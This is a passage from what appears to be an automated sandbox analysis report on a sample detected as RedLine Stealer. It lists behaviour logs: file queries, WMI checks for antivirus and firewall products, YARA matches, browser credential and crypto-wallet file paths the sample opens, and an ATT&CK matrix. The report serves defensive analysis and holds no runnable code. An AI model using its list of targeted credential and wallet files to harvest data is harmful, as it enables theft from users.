Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Users\user\AppData\Roaming\325.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Code function: 0_2_00000001400C22A8 GetLocalTime,

0_2_00000001400C22A8

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Code function: 0_2_000000014004F760 GetComputerNameW,GetUserNameW,

0_2_000000014004F760

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Code function: 0_2_0000000140001270 GetModuleHandleW,GetProcAddress,GetVersionExW,

0_2_0000000140001270

Source: C:\Users\user\AppData\Roaming\325.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 325.exe, 0000000E.00000002.362916266.0000000000EDE000.00000004.00000020.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Roaming\325.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\325.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\325.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\325.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\325.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\325.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 2.2.325.exe.3b45a60.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.325.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.325.exe.3b45a60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Roaming\325.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Show sources

Source: C:\Users\user\AppData\Roaming\325.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\			Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\			Jump to behavior

Source: kS2dqbsDwD.exe	Binary or memory string: WIN_XP
Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp	Binary or memory string: ?A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowInputThenPlayLogoffSingle1.1.23.05\AutoHotkey.exeWIN32_NTWIN_XPWIN_7WIN_8.1WIN_8WIN_VISTAWIN_2003%04hXcomspecAppStartingArrowCrossIBeamNoUncheckChooseChooseStringEnabledVisibleShowDropDownHideDropDownTabLeftTabRightEditPasteCheckedFindStringChoiceLineCountCurrentLineCurrentColadvapi32RunAs: Missing advapi32.dll.CreateProcessWithLogonWCreateProcessWithLogonW.0.0.0.0&CombowininetInternetOpenWInternetOpenUrlWInternetCloseHandleInternetReadFileExAInternetReadFilewbThe maximum number of Folder Dialogs has been reached.Select Folder - %sshell32SHEmptyRecycleBinW%u.%u.%u.%u\.*SeShutdownPrivilegeCreateToolhelp32SnapshotProcess32FirstWProcess32NextWComObjTypenameiidNo valid COM object!0x%08X -
Source: kS2dqbsDwD.exe	Binary or memory string: WIN_VISTA
Source: kS2dqbsDwD.exe	Binary or memory string: WIN_7
Source: kS2dqbsDwD.exe	Binary or memory string: WIN_8
Source: kS2dqbsDwD.exe	Binary or memory string: WIN_8.1

Source: Yara match

File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY

Remote Access Functionality:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 2.2.325.exe.3b45a60.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.325.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.325.exe.3b45a60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140017E10 Shell_NotifyIconW,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,RemoveClipboardFormatListener,ChangeClipboardChain,mciSendStringW,mciSendStringW,RtlDeleteCriticalSection,OleUninitialize,	0_2_0000000140017E10
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140058440 RemoveClipboardFormatListener,ChangeClipboardChain,	0_2_0000000140058440
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140018920 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain,	0_2_0000000140018920

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Spearphishing Link1	Windows Management Instrumentation221	Path Interception	Exploitation for Privilege Escalation1	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery11	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Access Token Manipulation1	Deobfuscate/Decode Files or Information1	Input Capture31	Account Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection12	Obfuscated Files or Information3	Security Account Manager	File and Directory Discovery1	SMB/Windows Admin Shares	Screen Capture1	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing23	NTDS	System Information Discovery136	Distributed Component Object Model	Input Capture31	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
